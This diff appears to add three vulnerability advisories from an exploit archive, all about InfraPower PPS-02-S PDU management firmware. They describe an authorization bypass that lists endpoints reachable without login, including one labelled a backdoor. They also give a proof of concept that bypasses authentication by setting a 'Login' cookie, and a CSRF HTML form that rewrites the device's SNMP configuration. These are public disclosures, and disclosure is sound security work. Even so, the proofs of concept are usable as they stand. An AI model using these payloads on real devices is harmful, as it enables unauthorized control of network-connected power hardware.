platforms/php/webapps/40644.txt
Executable file
|
@ -0,0 +1,54 @@
|
||||||
|
InfraPower PPS-02-S Q213V1 Insecure Direct Object Reference Authorization Bypass
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Austin Hughes Electronics Ltd.
|
||||||
|
Product web page: http://www.austin-hughes.com
|
||||||
|
Affected version: Q213V1 (Firmware: V2395S)
|
||||||
|
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
|
||||||
|
|
||||||
|
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
|
||||||
|
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
|
||||||
|
Patented IP Dongle provides IP remote access to the PDUs by a true
|
||||||
|
network IP address chain. Only 1xIP dongle allows access to max. 16
|
||||||
|
PDUs in daisy chain - which is a highly efficient cient application
|
||||||
|
for saving not only the IP remote accessories cost, but also the true
|
||||||
|
IP addresses required on the PDU management.
|
||||||
|
|
||||||
|
Desc: Insecure Direct Object References occur when an application
|
||||||
|
provides direct access to objects based on user-supplied input. As
|
||||||
|
a result of this vulnerability attackers can bypass authorization
|
||||||
|
and access resources and functionalities in the system directly, for
|
||||||
|
example APIs, files, upload utilities, device settings, etc.
|
||||||
|
|
||||||
|
Tested on: Linux 2.6.28 (armv5tel)
|
||||||
|
lighttpd/1.4.30-devel-1321
|
||||||
|
PHP/5.3.9
|
||||||
|
SQLite/3.7.10
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2016-5373
|
||||||
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5373.php
|
||||||
|
|
||||||
|
|
||||||
|
27.09.2016
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
GET /ConnPort.php
|
||||||
|
GET /CSSSource.php
|
||||||
|
GET /dball.php
|
||||||
|
GET /doupgrate.php
|
||||||
|
GET /IPSettings.php
|
||||||
|
GET /ListFile.php
|
||||||
|
GET /Menu.php
|
||||||
|
GET /Ntp.php
|
||||||
|
GET /PDUDetails_Ajax_Details.php
|
||||||
|
GET /PDULog.php
|
||||||
|
GET /PortSettings.php
|
||||||
|
GET /production_test1.php ("backdoor")
|
||||||
|
GET /UploadEXE.php
|
142
platforms/php/webapps/40645.txt
Executable file
142
platforms/php/webapps/40645.txt
Executable file
|
@ -0,0 +1,142 @@
|
||||||
|
InfraPower PPS-02-S Q213V1 Authentication Bypass Vulnerability
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Austin Hughes Electronics Ltd.
|
||||||
|
Product web page: http://www.austin-hughes.com
|
||||||
|
Affected version: Q213V1 (Firmware: V2395S)
|
||||||
|
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
|
||||||
|
|
||||||
|
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
|
||||||
|
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
|
||||||
|
Patented IP Dongle provides IP remote access to the PDUs by a true
|
||||||
|
network IP address chain. Only 1xIP dongle allows access to max. 16
|
||||||
|
PDUs in daisy chain - which is a highly efficient cient application
|
||||||
|
for saving not only the IP remote accessories cost, but also the true
|
||||||
|
IP addresses required on the PDU management.
|
||||||
|
|
||||||
|
Desc: The device does not properly perform authentication, allowing
|
||||||
|
it to be bypassed through cookie manipulation. The vulnerable function
|
||||||
|
checkLogin() in 'Function.php' checks only if the 'Login' Cookie is empty
|
||||||
|
or not, allowing easy bypass of the user security mechanisms.
|
||||||
|
|
||||||
|
Tested on: Linux 2.6.28 (armv5tel)
|
||||||
|
lighttpd/1.4.30-devel-1321
|
||||||
|
PHP/5.3.9
|
||||||
|
SQLite/3.7.10
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2016-5374
|
||||||
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5374.php
|
||||||
|
|
||||||
|
|
||||||
|
27.09.2016
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
(example) System.php:
|
||||||
|
---------------------
|
||||||
|
1: <?php
|
||||||
|
2:
|
||||||
|
3: require_once("Function.php");
|
||||||
|
4: session_start();
|
||||||
|
5: if(!checkLogin())
|
||||||
|
6: header('Location: Login.php');
|
||||||
|
7:
|
||||||
|
|
||||||
|
---------------------------------------
|
||||||
|
Function.php:
|
||||||
|
-------------
|
||||||
|
155: function checkLogin(){
|
||||||
|
156: if(empty($_SESSION['Login']))
|
||||||
|
157: return false;
|
||||||
|
158: return true;
|
||||||
|
159: }
|
||||||
|
160:
|
||||||
|
|
||||||
|
|
||||||
|
--------------------
|
||||||
|
'Sessioned' scripts:
|
||||||
|
|
||||||
|
➜ www grep -rHn 'session_start' /Users/liwomac/Desktop/infrapower_files/www
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:3: session_start();
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:3: session_start();
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Login.php:2: session_start();
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:2: session_start();
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:3: session_start();
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:3: session_start();
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:3: session_start();
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:9: session_start();
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:3: session_start();
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:3: session_start();
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:3: session_start();
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:3: session_start();
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/System.php:4: session_start();
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/User.php:3: session_start();
|
||||||
|
|
||||||
|
➜ www grep -rHn 'session_destroy' /Users/liwomac/Desktop/infrapower_files/www
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Function.php:256: session_destroy();
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Function.php:266: session_destroy();
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:7: session_destroy();
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/System.php:53: session_destroy();
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/System.php:63: session_destroy();
|
||||||
|
|
||||||
|
➜ www grep -rHn '$_SESSION' /Users/liwomac/Desktop/infrapower_files/www
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Function.php:11: if(isset($_SESSION['ite'])){
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Function.php:12: $this->init($_SESSION['ite']);
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Function.php:156: if(empty($_SESSION['Login']))
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Function.php:233: if(!isset($_SESSION['TimeSync'])){
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Function.php:234: $_SESSION['TimeSync'] = getConf("/mnt/mtd/main_conf", "TimeSyncPDU_opt");
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Function.php:235: if($_SESSION['TimeSync'] == "ON"){
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Function.php:237: $_SESSION['SyncDate'] = explode(":",$SyncDate);
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Function.php:239: $_SESSION['TimeSync'] = "OFF";
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Function.php:240: $_SESSION['SyncDate'][0] = "0";
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Function.php:241: $_SESSION['SyncDate'][1] = "0";
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Function.php:255: unset($_SESSION['Login']);
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Function.php:265: unset($_SESSION['Login']);
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Login.php:31: $_SESSION['ite'] = substr($this->InfraType,1,1); // e.g."t3v3" get the second chr 3;
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Login.php:64: $_SESSION['ite'] = "1";
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Login.php:67: $_SESSION['ite'] = "2";
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Login.php:70: $_SESSION['ite'] = "3";
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Login.php:73: $_SESSION['ite'] = "3";
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Login.php:76: $_SESSION['ite'] = "3";
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Login.php:79: $_SESSION['ite'] = "4";
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Login.php:82: $_SESSION['ite'] = FALSE;
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Login.php:91:$_SESSION['ite'] = $InfraType;
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Login.php:137: $_SESSION['Login'] = $_POST['ID_User'];
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Login.php:140: $_SESSION['Login'] = $_POST['ID_User'];
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Login.php:156: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Login.php:167: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:3: $_SESSION['Login'];
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:4: if (isset($_SESSION['Login'])){
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:5: unset($_SESSION['Login']);
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Menu.php:60: /*if ($_SESSION["SS_SystemCreated"] == "1") {
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/System.php:52: unset($_SESSION['Login']);
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/System.php:62: unset($_SESSION['Login']);
|
||||||
|
|
||||||
|
➜ www grep -rHn 'checkLogin' /Users/liwomac/Desktop/infrapower_files/www
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:4: if(!checkLogin())
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Function.php:155: function checkLogin(){
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:4: if(!checkLogin())
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/Login.php:165: if(checkLogin()) {
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:4: if(!checkLogin())
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:4: if(!checkLogin())
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:4: if(!checkLogin())
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:10: if(!checkLogin())
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:4: if(!checkLogin())
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:4: if(!checkLogin())
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:4: if(!checkLogin())
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:4: if(!checkLogin())
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/System.php:5: if(!checkLogin())
|
||||||
|
/Users/liwomac/Desktop/infrapower_files/www/User.php:4: if(!checkLogin())
|
||||||
|
|
||||||
|
|
||||||
|
PoC:
|
||||||
|
|
||||||
|
javascript:document.cookie="Login=StrangerThings;expires=Sat, 09 Dec 2017 11:05:17 GMT"
|
||||||
|
|
||||||
|
--
|
53
platforms/php/webapps/40646.txt
Executable file
53
platforms/php/webapps/40646.txt
Executable file
|
@ -0,0 +1,53 @@
|
||||||
|
InfraPower PPS-02-S Q213V1 Cross-Site Request Forgery
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Austin Hughes Electronics Ltd.
|
||||||
|
Product web page: http://www.austin-hughes.com
|
||||||
|
Affected version: Q213V1 (Firmware: V2395S)
|
||||||
|
|
||||||
|
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
|
||||||
|
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
|
||||||
|
Patented IP Dongle provides IP remote access to the PDUs by a true
|
||||||
|
network IP address chain. Only 1xIP dongle allows access to max. 16
|
||||||
|
PDUs in daisy chain - which is a highly efficient cient application
|
||||||
|
for saving not only the IP remote accessories cost, but also the true
|
||||||
|
IP addresses required on the PDU management.
|
||||||
|
|
||||||
|
Desc: The application interface allows users to perform certain actions
|
||||||
|
via HTTP requests without performing any validity checks to verify the
|
||||||
|
requests. This can be exploited to perform certain actions with admin
|
||||||
|
privileges if a logged-in user visits a malicious web site.
|
||||||
|
|
||||||
|
Tested on: Linux 2.6.28 (armv5tel)
|
||||||
|
lighttpd/1.4.30-devel-1321
|
||||||
|
PHP/5.3.9
|
||||||
|
SQLite/3.7.10
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2016-5375
|
||||||
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5375.php
|
||||||
|
|
||||||
|
|
||||||
|
27.09.2016
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
PoC:
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form action="http://192.168.0.17/SNMP.php?Menu=SMP" method="POST">
|
||||||
|
<input type="hidden" name="SNMPAgent" value="Enable" />
|
||||||
|
<input type="hidden" name="CommuintyString" value="public" />
|
||||||
|
<input type="hidden" name="CommuintyWrite" value="private" />
|
||||||
|
<input type="hidden" name="TrapsVersion" value="v2Trap" />
|
||||||
|
<input type="hidden" name="IP" value="192.168.0.254" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
Loading…
Add table
Reference in a new issue